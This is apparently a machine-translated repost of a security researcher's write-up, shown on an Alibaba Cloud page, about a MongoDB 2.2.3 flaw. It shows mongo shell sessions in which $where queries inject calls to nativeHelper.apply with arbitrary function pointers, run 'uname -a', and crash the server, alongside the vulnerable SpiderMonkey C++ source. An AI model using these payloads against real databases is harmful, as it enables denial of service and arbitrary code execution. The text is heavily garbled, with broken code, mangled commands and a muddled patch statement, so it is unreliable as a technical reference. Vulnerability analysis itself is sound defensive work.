Security InvestigatorAgixidInMongoDBDatabase2.2.3A security vulnerability is detected in the version and indicatesMetasploitExploitationPayloadUnder development.This vulnerability is mainly caused by incorrect use of the NativeHelper function of SpiderMonkey Javascript in MongoDB, which may cause injection code or buffer overflow to execute arbitrary code.
The following are some analyses provided by researchers.
First, try some server-side JavaScript injection in MongoDB and run a shell.
> Run ("uname", "-")
Sun Mar 25 07:09:49 shell: started program
Sh1838 | Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux
0
The following command is valid only on the mongo client.
> Db. my_collection.find ({$ where: "run ('LS ')"})
Error :{
"$ Err": "error on invocation of $ where function: \ nJS Error: ReferenceError: run is not defined nofile_a: 0 ",
"Code": 10071
}
The investigator continues to make an in-depth Attempt
> Run
Function (){
Return nativeHelper. apply (run _, arguments );
}
Run the <run> function and directly call nativeHelper. apply (run _, ["uname", "-a"]) on the server. The returned message indicates that the nativeHelper. apply method exists.
> Db. my_collection.find ({$ where: 'nativehelper. apply (run _, ["uname", "-a"]); '})
Error :{
"$ Err": "error on invocation of $ where function: \ nJS Error: ReferenceError: run _ is not defined nofile_a: 0 ",
"Code": 10071
}
Apply an associated array to the server
> Db. my_collection.find ({$ where: 'nativehelper. apply ({"x": 135246144}, ["uname", "-a"]); '})
Sun Mar 25 07:15:26 DBClientCursor: init call () failed
Sun Mar 25 07:15:26 query failed: sthack. my_collection {$ where: "nativeHelper. apply ({"x": 135246144}, ["uname", "-a"]); "} to: 127.0.0.1: 27017
Error: error doing query: failed
Sun Mar 25 07:15:26 trying reconnect to 127.0.0.1: 27017
Sun Mar 25 07:15:26 reconnect 127.0.0.1: 27017 failed couldn't connect to server 127.0.0.1: 27017
The result shows: The server crashed \ o /! (Crash)
Check its source code
Path:./src/mongo/scripting/engine_spidermonkey.cpp
JSBool native_helper (JSContext * cx, JSObject * obj, uintN argc, jsval * argv, jsval * rval ){
Try {
Convertor c (cx );
NativeFunction func = reinterpret_cast (
Static_cast (c. getNumber (obj, "x ")));
Void * data = reinterpret_cast <void *> (
Static_cast (c. getNumber (obj, "y ")));
Verify (func );
BSONObj;
If (argc> 0 ){
BSONObjBuilder args;
For (uintN I = 0; I <argc; ++ I ){
C. append (args, args. numStr (I), argv [I]);
}
A = args. obj ();
}
BSONObj out;
Try {
Out = func (a, data );
}
Catch (std: exception & e ){
The functions of the original function are called from x: 135246144 to JavaScript objects without any check.
> Db. my_collection.find ({$ where: 'nativehelper. apply ({"x": 0x31337}, ["uname", "-a"]); '})
Sun Mar 25 07:20:03 Invalid access at address: 0x31337 from thread: conn1
Sun Mar 25 07:20:03 Got signal: 11 (Segmentation fault ).
MongoDB has released the latest version 2.4.1 to fix this vulnerability,
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
